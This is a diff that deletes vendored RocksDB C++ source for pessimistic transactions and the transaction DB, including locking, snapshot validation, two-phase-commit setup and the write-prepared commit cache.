-          if (lock_upgrade) {
-            s = txn_db_impl_->TryLock(this, cfh_id, key_str,
-                                      false /* exclusive */);
-            assert(s.ok());
-          } else {
-            txn_db_impl_->UnLock(this, cfh_id, key.ToString());
-          }
-        }
-      }
-    }
-  }
-
-  if (s.ok()) {
-    // Let base class know we've conflict checked this key.
-    TrackKey(cfh_id, key_str, new_seqno, read_only, exclusive);
-  }
-
-  return s;
-}
-
-// Return OK() if this key has not been modified more recently than the
-// transaction snapshot_.
-Status PessimisticTransaction::ValidateSnapshot(
-    ColumnFamilyHandle* column_family, const Slice& key,
-    SequenceNumber prev_seqno, SequenceNumber* new_seqno) {
-  assert(snapshot_);
-
-  SequenceNumber seq = snapshot_->GetSequenceNumber();
-  if (prev_seqno <= seq) {
-    // If the key has been previous validated at a sequence number earlier
-    // than the curent snapshot's sequence number, we already know it has not
-    // been modified.
-    return Status::OK();
-  }
-
-  *new_seqno = seq;
-
-  ColumnFamilyHandle* cfh =
-      column_family ? column_family : db_impl_->DefaultColumnFamily();
-
-  return TransactionUtil::CheckKeyForConflicts(db_impl_, cfh, key.ToString(),
-                                               snapshot_->GetSequenceNumber(),
-                                               false /* cache_only */);
-}
-
-bool PessimisticTransaction::TryStealingLocks() {
-  assert(IsExpired());
-  TransactionState expected = STARTED;
-  return std::atomic_compare_exchange_strong(&txn_state_, &expected,
-                                             LOCKS_STOLEN);
-}
-
-void PessimisticTransaction::UnlockGetForUpdate(
-    ColumnFamilyHandle* column_family, const Slice& key) {
-  txn_db_impl_->UnLock(this, GetColumnFamilyID(column_family), key.ToString());
-}
-
-Status PessimisticTransaction::SetName(const TransactionName& name) {
-  Status s;
-  if (txn_state_ == STARTED) {
-    if (name_.length()) {
-      s = Status::InvalidArgument("Transaction has already been named.");
-    } else if (txn_db_impl_->GetTransactionByName(name) != nullptr) {
-      s = Status::InvalidArgument("Transaction name must be unique.");
-    } else if (name.length() < 1 || name.length() > 512) {
-      s = Status::InvalidArgument(
-          "Transaction name length must be between 1 and 512 chars.");
-    } else {
-      name_ = name;
-      txn_db_impl_->RegisterTransaction(this);
-    }
-  } else {
-    s = Status::InvalidArgument("Transaction is beyond state for naming.");
-  }
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.h b/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.h
deleted file mode 100644
index 5c6d4d2..0000000
--- a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.h
+++ /dev/null
@@ -1,230 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <atomic>
-#include <mutex>
-#include <stack>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "db/write_callback.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/autovector.h"
-#include "utilities/transactions/transaction_base.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-class PessimisticTransactionDB;
-
-// A transaction under pessimistic concurrency control. This class implements
-// the locking API and interfaces with the lock manager as well as the
-// pessimistic transactional db.
-class PessimisticTransaction : public TransactionBaseImpl {
- public:
-  PessimisticTransaction(TransactionDB* db, const WriteOptions& write_options,
-                         const TransactionOptions& txn_options);
-
-  virtual ~PessimisticTransaction();
-
-  void Reinitialize(TransactionDB* txn_db, const WriteOptions& write_options,
-                    const TransactionOptions& txn_options);
-
-  Status Prepare() override;
-
-  Status Commit() override;
-
-  virtual Status CommitBatch(WriteBatch* batch) = 0;
-
-  Status Rollback() override = 0;
-
-  Status RollbackToSavePoint() override;
-
-  Status SetName(const TransactionName& name) override;
-
-  // Generate a new unique transaction identifier
-  static TransactionID GenTxnID();
-
-  TransactionID GetID() const override { return txn_id_; }
-
-  std::vector<TransactionID> GetWaitingTxns(uint32_t* column_family_id,
-                                            std::string* key) const override {
-    std::lock_guard<std::mutex> lock(wait_mutex_);
-    std::vector<TransactionID> ids(waiting_txn_ids_.size());
-    if (key) *key = waiting_key_ ? *waiting_key_ : "";
-    if (column_family_id) *column_family_id = waiting_cf_id_;
-    std::copy(waiting_txn_ids_.begin(), waiting_txn_ids_.end(), ids.begin());
-    return ids;
-  }
-
-  void SetWaitingTxn(autovector<TransactionID> ids, uint32_t column_family_id,
-                     const std::string* key) {
-    std::lock_guard<std::mutex> lock(wait_mutex_);
-    waiting_txn_ids_ = ids;
-    waiting_cf_id_ = column_family_id;
-    waiting_key_ = key;
-  }
-
-  void ClearWaitingTxn() {
-    std::lock_guard<std::mutex> lock(wait_mutex_);
-    waiting_txn_ids_.clear();
-    waiting_cf_id_ = 0;
-    waiting_key_ = nullptr;
-  }
-
-  // Returns the time (in microseconds according to Env->GetMicros())
-  // that this transaction will be expired.  Returns 0 if this transaction does
-  // not expire.
-  uint64_t GetExpirationTime() const { return expiration_time_; }
-
-  // returns true if this transaction has an expiration_time and has expired.
-  bool IsExpired() const;
-
-  // Returns the number of microseconds a transaction can wait on acquiring a
-  // lock or -1 if there is no timeout.
-  int64_t GetLockTimeout() const { return lock_timeout_; }
-  void SetLockTimeout(int64_t timeout) override {
-    lock_timeout_ = timeout * 1000;
-  }
-
-  // Returns true if locks were stolen successfully, false otherwise.
-  bool TryStealingLocks();
-
-  bool IsDeadlockDetect() const override { return deadlock_detect_; }
-
-  int64_t GetDeadlockDetectDepth() const { return deadlock_detect_depth_; }
-
- protected:
-  virtual Status PrepareInternal() = 0;
-
-  virtual Status CommitWithoutPrepareInternal() = 0;
-
-  virtual Status CommitInternal() = 0;
-
-  void Initialize(const TransactionOptions& txn_options);
-
-  Status LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock);
-
-  Status TryLock(ColumnFamilyHandle* column_family, const Slice& key,
-                 bool read_only, bool exclusive,
-                 bool untracked = false) override;
-
-  void Clear() override;
-
-  PessimisticTransactionDB* txn_db_impl_;
-  DBImpl* db_impl_;
-
-  // If non-zero, this transaction should not be committed after this time (in
-  // microseconds according to Env->NowMicros())
-  uint64_t expiration_time_;
-
- private:
-  // Used to create unique ids for transactions.
-  static std::atomic<TransactionID> txn_id_counter_;
-
-  // Unique ID for this transaction
-  TransactionID txn_id_;
-
-  // IDs for the transactions that are blocking the current transaction.
-  //
-  // empty if current transaction is not waiting.
-  autovector<TransactionID> waiting_txn_ids_;
-
-  // The following two represents the (cf, key) that a transaction is waiting
-  // on.
-  //
-  // If waiting_key_ is not null, then the pointer should always point to
-  // a valid string object. The reason is that it is only non-null when the
-  // transaction is blocked in the TransactionLockMgr::AcquireWithTimeout
-  // function. At that point, the key string object is one of the function
-  // parameters.
-  uint32_t waiting_cf_id_;
-  const std::string* waiting_key_;
-
-  // Mutex protecting waiting_txn_ids_, waiting_cf_id_ and waiting_key_.
-  mutable std::mutex wait_mutex_;
-
-  // Timeout in microseconds when locking a key or -1 if there is no timeout.
-  int64_t lock_timeout_;
-
-  // Whether to perform deadlock detection or not.
-  bool deadlock_detect_;
-
-  // Whether to perform deadlock detection or not.
-  int64_t deadlock_detect_depth_;
-
-  Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key,
-                          SequenceNumber prev_seqno, SequenceNumber* new_seqno);
-
-  void UnlockGetForUpdate(ColumnFamilyHandle* column_family,
-                          const Slice& key) override;
-
-  // No copying allowed
-  PessimisticTransaction(const PessimisticTransaction&);
-  void operator=(const PessimisticTransaction&);
-};
-
-class WriteCommittedTxn : public PessimisticTransaction {
- public:
-  WriteCommittedTxn(TransactionDB* db, const WriteOptions& write_options,
-                    const TransactionOptions& txn_options);
-
-  virtual ~WriteCommittedTxn() {}
-
-  Status CommitBatch(WriteBatch* batch) override;
-
-  Status Rollback() override;
-
- private:
-  Status PrepareInternal() override;
-
-  Status CommitWithoutPrepareInternal() override;
-
-  Status CommitInternal() override;
-
-  Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key,
-                          SequenceNumber prev_seqno, SequenceNumber* new_seqno);
-
-  // No copying allowed
-  WriteCommittedTxn(const WriteCommittedTxn&);
-  void operator=(const WriteCommittedTxn&);
-};
-
-// Used at commit time to check whether transaction is committing before its
-// expiration time.
-class TransactionCallback : public WriteCallback {
- public:
-  explicit TransactionCallback(PessimisticTransaction* txn) : txn_(txn) {}
-
-  Status Callback(DB* /* unused */) override {
-    if (txn_->IsExpired()) {
-      return Status::Expired();
-    } else {
-      return Status::OK();
-    }
-  }
-
-  bool AllowWriteBatching() override { return true; }
-
- private:
-  PessimisticTransaction* txn_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.cc b/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.cc
deleted file mode 100644
index 8fa9575..0000000
--- a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.cc
+++ /dev/null
@@ -1,806 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/transactions/pessimistic_transaction_db.h"
-
-#include <inttypes.h>
-#include <string>
-#include <unordered_set>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "util/cast_util.h"
-#include "util/mutexlock.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-#include "utilities/transactions/transaction_db_mutex_impl.h"
-
-namespace rocksdb {
-
-PessimisticTransactionDB::PessimisticTransactionDB(
-    DB* db, const TransactionDBOptions& txn_db_options)
-    : TransactionDB(db),
-      db_impl_(static_cast_with_check<DBImpl, DB>(db)),
-      txn_db_options_(txn_db_options),
-      lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks,
-                txn_db_options_.max_num_deadlocks,
-                txn_db_options_.custom_mutex_factory
-                    ? txn_db_options_.custom_mutex_factory
-                    : std::shared_ptr<TransactionDBMutexFactory>(
-                          new TransactionDBMutexFactoryImpl())) {
-  assert(db_impl_ != nullptr);
-  info_log_ = db_impl_->GetDBOptions().info_log;
-}
-
-// Support initiliazing PessimisticTransactionDB from a stackable db
-//
-//    PessimisticTransactionDB
-//     ^        ^
-//     |        |
-//     |        +
-//     |   StackableDB
-//     |   ^
-//     |   |
-//     +   +
-//     DBImpl
-//       ^
-//       |(inherit)
-//       +
-//       DB
-//
-PessimisticTransactionDB::PessimisticTransactionDB(
-    StackableDB* db, const TransactionDBOptions& txn_db_options)
-    : TransactionDB(db),
-      db_impl_(static_cast_with_check<DBImpl, DB>(db->GetRootDB())),
-      txn_db_options_(txn_db_options),
-      lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks,
-                txn_db_options_.max_num_deadlocks,
-                txn_db_options_.custom_mutex_factory
-                    ? txn_db_options_.custom_mutex_factory
-                    : std::shared_ptr<TransactionDBMutexFactory>(
-                          new TransactionDBMutexFactoryImpl())) {
-  assert(db_impl_ != nullptr);
-}
-
-PessimisticTransactionDB::~PessimisticTransactionDB() {
-  while (!transactions_.empty()) {
-    delete transactions_.begin()->second;
-  }
-}
-
-Status PessimisticTransactionDB::Initialize(
-    const std::vector<size_t>& compaction_enabled_cf_indices,
-    const std::vector<ColumnFamilyHandle*>& handles) {
-  for (auto cf_ptr : handles) {
-    AddColumnFamily(cf_ptr);
-  }
-  // Re-enable compaction for the column families that initially had
-  // compaction enabled.
-  std::vector<ColumnFamilyHandle*> compaction_enabled_cf_handles;
-  compaction_enabled_cf_handles.reserve(compaction_enabled_cf_indices.size());
-  for (auto index : compaction_enabled_cf_indices) {
-    compaction_enabled_cf_handles.push_back(handles[index]);
-  }
-
-  Status s = EnableAutoCompaction(compaction_enabled_cf_handles);
-
-  // create 'real' transactions from recovered shell transactions
-  auto dbimpl = reinterpret_cast<DBImpl*>(GetRootDB());
-  assert(dbimpl != nullptr);
-  auto rtrxs = dbimpl->recovered_transactions();
-
-  for (auto it = rtrxs.begin(); it != rtrxs.end(); it++) {
-    auto recovered_trx = it->second;
-    assert(recovered_trx);
-    assert(recovered_trx->log_number_);
-    assert(recovered_trx->name_.length());
-
-    WriteOptions w_options;
-    w_options.sync = true;
-    TransactionOptions t_options;
-
-    Transaction* real_trx = BeginTransaction(w_options, t_options, nullptr);
-    assert(real_trx);
-    real_trx->SetLogNumber(recovered_trx->log_number_);
-
-    s = real_trx->SetName(recovered_trx->name_);
-    if (!s.ok()) {
-      break;
-    }
-
-    s = real_trx->RebuildFromWriteBatch(recovered_trx->batch_);
-    real_trx->SetState(Transaction::PREPARED);
-    if (!s.ok()) {
-      break;
-    }
-  }
-  if (s.ok()) {
-    dbimpl->DeleteAllRecoveredTransactions();
-  }
-  return s;
-}
-
-Transaction* WriteCommittedTxnDB::BeginTransaction(
-    const WriteOptions& write_options, const TransactionOptions& txn_options,
-    Transaction* old_txn) {
-  if (old_txn != nullptr) {
-    ReinitializeTransaction(old_txn, write_options, txn_options);
-    return old_txn;
-  } else {
-    return new WriteCommittedTxn(this, write_options, txn_options);
-  }
-}
-
-Transaction* WritePreparedTxnDB::BeginTransaction(
-    const WriteOptions& write_options, const TransactionOptions& txn_options,
-    Transaction* old_txn) {
-  if (old_txn != nullptr) {
-    ReinitializeTransaction(old_txn, write_options, txn_options);
-    return old_txn;
-  } else {
-    return new WritePreparedTxn(this, write_options, txn_options);
-  }
-}
-
-TransactionDBOptions PessimisticTransactionDB::ValidateTxnDBOptions(
-    const TransactionDBOptions& txn_db_options) {
-  TransactionDBOptions validated = txn_db_options;
-
-  if (txn_db_options.num_stripes == 0) {
-    validated.num_stripes = 1;
-  }
-
-  return validated;
-}
-
-Status TransactionDB::Open(const Options& options,
-                           const TransactionDBOptions& txn_db_options,
-                           const std::string& dbname, TransactionDB** dbptr) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = TransactionDB::Open(db_options, txn_db_options, dbname,
-                                 column_families, &handles, dbptr);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-
-  return s;
-}
-
-Status TransactionDB::Open(
-    const DBOptions& db_options, const TransactionDBOptions& txn_db_options,
-    const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles, TransactionDB** dbptr) {
-  Status s;
-  DB* db;
-
-  std::vector<ColumnFamilyDescriptor> column_families_copy = column_families;
-  std::vector<size_t> compaction_enabled_cf_indices;
-  DBOptions db_options_2pc = db_options;
-  PrepareWrap(&db_options_2pc, &column_families_copy,
-              &compaction_enabled_cf_indices);
-  s = DB::Open(db_options_2pc, dbname, column_families_copy, handles, &db);
-  if (s.ok()) {
-    s = WrapDB(db, txn_db_options, compaction_enabled_cf_indices, *handles,
-               dbptr);
-  }
-  return s;
-}
-
-void TransactionDB::PrepareWrap(
-    DBOptions* db_options, std::vector<ColumnFamilyDescriptor>* column_families,
-    std::vector<size_t>* compaction_enabled_cf_indices) {
-  compaction_enabled_cf_indices->clear();
-
-  // Enable MemTable History if not already enabled
-  for (size_t i = 0; i < column_families->size(); i++) {
-    ColumnFamilyOptions* cf_options = &(*column_families)[i].options;
-
-    if (cf_options->max_write_buffer_number_to_maintain == 0) {
-      // Setting to -1 will set the History size to max_write_buffer_number.
-      cf_options->max_write_buffer_number_to_maintain = -1;
-    }
-    if (!cf_options->disable_auto_compactions) {
-      // Disable compactions momentarily to prevent race with DB::Open
-      cf_options->disable_auto_compactions = true;
-      compaction_enabled_cf_indices->push_back(i);
-    }
-  }
-  db_options->allow_2pc = true;
-}
-
-Status TransactionDB::WrapDB(
-    // make sure this db is already opened with memtable history enabled,
-    // auto compaction distabled and 2 phase commit enabled
-    DB* db, const TransactionDBOptions& txn_db_options,
-    const std::vector<size_t>& compaction_enabled_cf_indices,
-    const std::vector<ColumnFamilyHandle*>& handles, TransactionDB** dbptr) {
-  PessimisticTransactionDB* txn_db;
-  switch (txn_db_options.write_policy) {
-    case WRITE_UNPREPARED:
-      return Status::NotSupported("WRITE_UNPREPARED is not implemented yet");
-    case WRITE_PREPARED:
-      txn_db = new WritePreparedTxnDB(
-          db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options));
-      break;
-    case WRITE_COMMITTED:
-    default:
-      txn_db = new WriteCommittedTxnDB(
-          db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options));
-  }
-  *dbptr = txn_db;
-  Status s = txn_db->Initialize(compaction_enabled_cf_indices, handles);
-  return s;
-}
-
-Status TransactionDB::WrapStackableDB(
-    // make sure this stackable_db is already opened with memtable history
-    // enabled,
-    // auto compaction distabled and 2 phase commit enabled
-    StackableDB* db, const TransactionDBOptions& txn_db_options,
-    const std::vector<size_t>& compaction_enabled_cf_indices,
-    const std::vector<ColumnFamilyHandle*>& handles, TransactionDB** dbptr) {
-  PessimisticTransactionDB* txn_db;
-  switch (txn_db_options.write_policy) {
-    case WRITE_UNPREPARED:
-      return Status::NotSupported("WRITE_UNPREPARED is not implemented yet");
-    case WRITE_PREPARED:
-      txn_db = new WritePreparedTxnDB(
-          db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options));
-      break;
-    case WRITE_COMMITTED:
-    default:
-      txn_db = new WriteCommittedTxnDB(
-          db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options));
-  }
-  *dbptr = txn_db;
-  Status s = txn_db->Initialize(compaction_enabled_cf_indices, handles);
-  return s;
-}
-
-// Let TransactionLockMgr know that this column family exists so it can
-// allocate a LockMap for it.
-void PessimisticTransactionDB::AddColumnFamily(
-    const ColumnFamilyHandle* handle) {
-  lock_mgr_.AddColumnFamily(handle->GetID());
-}
-
-Status PessimisticTransactionDB::CreateColumnFamily(
-    const ColumnFamilyOptions& options, const std::string& column_family_name,
-    ColumnFamilyHandle** handle) {
-  InstrumentedMutexLock l(&column_family_mutex_);
-
-  Status s = db_->CreateColumnFamily(options, column_family_name, handle);
-  if (s.ok()) {
-    lock_mgr_.AddColumnFamily((*handle)->GetID());
-  }
-
-  return s;
-}
-
-// Let TransactionLockMgr know that it can deallocate the LockMap for this
-// column family.
-Status PessimisticTransactionDB::DropColumnFamily(
-    ColumnFamilyHandle* column_family) {
-  InstrumentedMutexLock l(&column_family_mutex_);
-
-  Status s = db_->DropColumnFamily(column_family);
-  if (s.ok()) {
-    lock_mgr_.RemoveColumnFamily(column_family->GetID());
-  }
-
-  return s;
-}
-
-Status PessimisticTransactionDB::TryLock(PessimisticTransaction* txn,
-                                         uint32_t cfh_id,
-                                         const std::string& key,
-                                         bool exclusive) {
-  return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive);
-}
-
-void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn,
-                                      const TransactionKeyMap* keys) {
-  lock_mgr_.UnLock(txn, keys, GetEnv());
-}
-
-void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn,
-                                      uint32_t cfh_id, const std::string& key) {
-  lock_mgr_.UnLock(txn, cfh_id, key, GetEnv());
-}
-
-// Used when wrapping DB write operations in a transaction
-Transaction* PessimisticTransactionDB::BeginInternalTransaction(
-    const WriteOptions& options) {
-  TransactionOptions txn_options;
-  Transaction* txn = BeginTransaction(options, txn_options, nullptr);
-
-  // Use default timeout for non-transactional writes
-  txn->SetLockTimeout(txn_db_options_.default_lock_timeout);
-  return txn;
-}
-
-// All user Put, Merge, Delete, and Write requests must be intercepted to make
-// sure that they lock all keys that they are writing to avoid causing conflicts
-// with any concurrent transactions. The easiest way to do this is to wrap all
-// write operations in a transaction.
-//
-// Put(), Merge(), and Delete() only lock a single key per call.  Write() will
-// sort its keys before locking them.  This guarantees that TransactionDB write
-// methods cannot deadlock with eachother (but still could deadlock with a
-// Transaction).
-Status PessimisticTransactionDB::Put(const WriteOptions& options,
-                                     ColumnFamilyHandle* column_family,
-                                     const Slice& key, const Slice& val) {
-  Status s;
-
-  Transaction* txn = BeginInternalTransaction(options);
-  txn->DisableIndexing();
-
-  // Since the client didn't create a transaction, they don't care about
-  // conflict checking for this write.  So we just need to do PutUntracked().
-  s = txn->PutUntracked(column_family, key, val);
-
-  if (s.ok()) {
-    s = txn->Commit();
-  }
-
-  delete txn;
-
-  return s;
-}
-
-Status PessimisticTransactionDB::Delete(const WriteOptions& wopts,
-                                        ColumnFamilyHandle* column_family,
-                                        const Slice& key) {
-  Status s;
-
-  Transaction* txn = BeginInternalTransaction(wopts);
-  txn->DisableIndexing();
-
-  // Since the client didn't create a transaction, they don't care about
-  // conflict checking for this write.  So we just need to do
-  // DeleteUntracked().
-  s = txn->DeleteUntracked(column_family, key);
-
-  if (s.ok()) {
-    s = txn->Commit();
-  }
-
-  delete txn;
-
-  return s;
-}
-
-Status PessimisticTransactionDB::Merge(const WriteOptions& options,
-                                       ColumnFamilyHandle* column_family,
-                                       const Slice& key, const Slice& value) {
-  Status s;
-
-  Transaction* txn = BeginInternalTransaction(options);
-  txn->DisableIndexing();
-
-  // Since the client didn't create a transaction, they don't care about
-  // conflict checking for this write.  So we just need to do
-  // MergeUntracked().
-  s = txn->MergeUntracked(column_family, key, value);
-
-  if (s.ok()) {
-    s = txn->Commit();
-  }
-
-  delete txn;
-
-  return s;
-}
-
-Status PessimisticTransactionDB::Write(const WriteOptions& opts,
-                                       WriteBatch* updates) {
-  // Need to lock all keys in this batch to prevent write conflicts with
-  // concurrent transactions.
-  Transaction* txn = BeginInternalTransaction(opts);
-  txn->DisableIndexing();
-
-  auto txn_impl =
-      static_cast_with_check<PessimisticTransaction, Transaction>(txn);
-
-  // Since commitBatch sorts the keys before locking, concurrent Write()
-  // operations will not cause a deadlock.
-  // In order to avoid a deadlock with a concurrent Transaction, Transactions
-  // should use a lock timeout.
-  Status s = txn_impl->CommitBatch(updates);
-
-  delete txn;
-
-  return s;
-}
-
-void PessimisticTransactionDB::InsertExpirableTransaction(
-    TransactionID tx_id, PessimisticTransaction* tx) {
-  assert(tx->GetExpirationTime() > 0);
-  std::lock_guard<std::mutex> lock(map_mutex_);
-  expirable_transactions_map_.insert({tx_id, tx});
-}
-
-void PessimisticTransactionDB::RemoveExpirableTransaction(TransactionID tx_id) {
-  std::lock_guard<std::mutex> lock(map_mutex_);
-  expirable_transactions_map_.erase(tx_id);
-}
-
-bool PessimisticTransactionDB::TryStealingExpiredTransactionLocks(
-    TransactionID tx_id) {
-  std::lock_guard<std::mutex> lock(map_mutex_);
-
-  auto tx_it = expirable_transactions_map_.find(tx_id);
-  if (tx_it == expirable_transactions_map_.end()) {
-    return true;
-  }
-  PessimisticTransaction& tx = *(tx_it->second);
-  return tx.TryStealingLocks();
-}
-
-void PessimisticTransactionDB::ReinitializeTransaction(
-    Transaction* txn, const WriteOptions& write_options,
-    const TransactionOptions& txn_options) {
-  auto txn_impl =
-      static_cast_with_check<PessimisticTransaction, Transaction>(txn);
-
-  txn_impl->Reinitialize(this, write_options, txn_options);
-}
-
-Transaction* PessimisticTransactionDB::GetTransactionByName(
-    const TransactionName& name) {
-  std::lock_guard<std::mutex> lock(name_map_mutex_);
-  auto it = transactions_.find(name);
-  if (it == transactions_.end()) {
-    return nullptr;
-  } else {
-    return it->second;
-  }
-}
-
-void PessimisticTransactionDB::GetAllPreparedTransactions(
-    std::vector<Transaction*>* transv) {
-  assert(transv);
-  transv->clear();
-  std::lock_guard<std::mutex> lock(name_map_mutex_);
-  for (auto it = transactions_.begin(); it != transactions_.end(); it++) {
-    if (it->second->GetState() == Transaction::PREPARED) {
-      transv->push_back(it->second);
-    }
-  }
-}
-
-TransactionLockMgr::LockStatusData
-PessimisticTransactionDB::GetLockStatusData() {
-  return lock_mgr_.GetLockStatusData();
-}
-
-std::vector<DeadlockPath> PessimisticTransactionDB::GetDeadlockInfoBuffer() {
-  return lock_mgr_.GetDeadlockInfoBuffer();
-}
-
-void PessimisticTransactionDB::SetDeadlockInfoBufferSize(uint32_t target_size) {
-  lock_mgr_.Resize(target_size);
-}
-
-void PessimisticTransactionDB::RegisterTransaction(Transaction* txn) {
-  assert(txn);
-  assert(txn->GetName().length() > 0);
-  assert(GetTransactionByName(txn->GetName()) == nullptr);
-  assert(txn->GetState() == Transaction::STARTED);
-  std::lock_guard<std::mutex> lock(name_map_mutex_);
-  transactions_[txn->GetName()] = txn;
-}
-
-void PessimisticTransactionDB::UnregisterTransaction(Transaction* txn) {
-  assert(txn);
-  std::lock_guard<std::mutex> lock(name_map_mutex_);
-  auto it = transactions_.find(txn->GetName());
-  assert(it != transactions_.end());
-  transactions_.erase(it);
-}
-
-// Returns true if commit_seq <= snapshot_seq
-bool WritePreparedTxnDB::IsInSnapshot(uint64_t prep_seq,
-                                      uint64_t snapshot_seq) {
-  // Here we try to infer the return value without looking into prepare list.
-  // This would help avoiding synchronization over a shared map.
-  // TODO(myabandeh): read your own writes
-  // TODO(myabandeh): optimize this. This sequence of checks must be correct but
-  // not necessary efficient
-  if (snapshot_seq < prep_seq) {
-    // snapshot_seq < prep_seq <= commit_seq => snapshot_seq < commit_seq
-    return false;
-  }
-  if (!delayed_prepared_empty_.load(std::memory_order_acquire)) {
-    // We should not normally reach here
-    ReadLock rl(&prepared_mutex_);
-    if (delayed_prepared_.find(prep_seq) != delayed_prepared_.end()) {
-      // Then it is not committed yet
-      return false;
-    }
-  }
-  auto indexed_seq = prep_seq % COMMIT_CACHE_SIZE;
-  CommitEntry cached;
-  bool exist = GetCommitEntry(indexed_seq, &cached);
-  if (!exist) {
-    // It is not committed, so it must be still prepared
-    return false;
-  }
-  if (prep_seq == cached.prep_seq) {
-    // It is committed and also not evicted from commit cache
-    return cached.commit_seq <= snapshot_seq;
-  }
-  // At this point we dont know if it was committed or it is still prepared
-  auto max_evicted_seq = max_evicted_seq_.load(std::memory_order_acquire);
-  if (max_evicted_seq < prep_seq) {
-    // Not evicted from cache and also not present, so must be still prepared
-    return false;
-  }
-  // When advancing max_evicted_seq_, we move older entires from prepared to
-  // delayed_prepared_. Also we move evicted entries from commit cache to
-  // old_commit_map_ if it overlaps with any snapshot. Since prep_seq <=
-  // max_evicted_seq_, we have three cases: i) in delayed_prepared_, ii) in
-  // old_commit_map_, iii) committed with no conflict with any snapshot (i)
-  // delayed_prepared_ is checked above
-  if (max_evicted_seq < snapshot_seq) {  // then (ii) cannot be the case
-    // only (iii) is the case: committed
-    // commit_seq <= max_evicted_seq_ < snapshot_seq => commit_seq <
-    // snapshot_seq
-    return true;
-  }
-  // else (ii) might be the case: check the commit data saved for this snapshot.
-  // If there was no overlapping commit entry, then it is committed with a
-  // commit_seq lower than any live snapshot, including snapshot_seq.
-  if (old_commit_map_empty_.load(std::memory_order_acquire)) {
-    return true;
-  }
-  {
-    // We should not normally reach here
-    ReadLock rl(&old_commit_map_mutex_);
-    auto old_commit_entry = old_commit_map_.find(prep_seq);
-    if (old_commit_entry == old_commit_map_.end() ||
-        old_commit_entry->second <= snapshot_seq) {
-      return true;
-    }
-  }
-  // (ii) it the case: it is committed but after the snapshot_seq
-  return false;
-}
-
-void WritePreparedTxnDB::AddPrepared(uint64_t seq) {
-  ROCKS_LOG_DEBUG(info_log_, "Txn %" PRIu64 " Prepareing", seq);
-  WriteLock wl(&prepared_mutex_);
-  prepared_txns_.push(seq);
-}
-
-void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq,
-                                      uint64_t commit_seq) {
-  ROCKS_LOG_DEBUG(info_log_, "Txn %" PRIu64 " Committing with %" PRIu64,
-                  prepare_seq, commit_seq);
-  auto indexed_seq = prepare_seq % COMMIT_CACHE_SIZE;
-  CommitEntry evicted;
-  bool to_be_evicted = GetCommitEntry(indexed_seq, &evicted);
-  if (to_be_evicted) {
-    auto prev_max = max_evicted_seq_.load(std::memory_order_acquire);
-    if (prev_max < evicted.commit_seq) {
-      // TODO(myabandeh) inc max in larger steps to avoid frequent updates
-      auto max_evicted_seq = evicted.commit_seq;
-      // When max_evicted_seq_ advances, move older entries from prepared_txns_
-      // to delayed_prepared_. This guarantees that if a seq is lower than max,
-      // then it is not in prepared_txns_ ans save an expensive, synchronized
-      // lookup from a shared set. delayed_prepared_ is expected to be empty in
-      // normal cases.
-      {
-        WriteLock wl(&prepared_mutex_);
-        while (!prepared_txns_.empty() &&
-               prepared_txns_.top() <= max_evicted_seq) {
-          auto to_be_popped = prepared_txns_.top();
-          delayed_prepared_.insert(to_be_popped);
-          prepared_txns_.pop();
-          delayed_prepared_empty_.store(false, std::memory_order_release);
-        }
-      }
-
-      // With each change to max_evicted_seq_ fetch the live snapshots behind it
-      SequenceNumber curr_seq;
-      std::vector<SequenceNumber> all_snapshots;
-      bool update_snapshots = false;
-      {
-        InstrumentedMutex(db_impl_->mutex());
-        // We use this to identify how fresh are the snapshot list. Since this
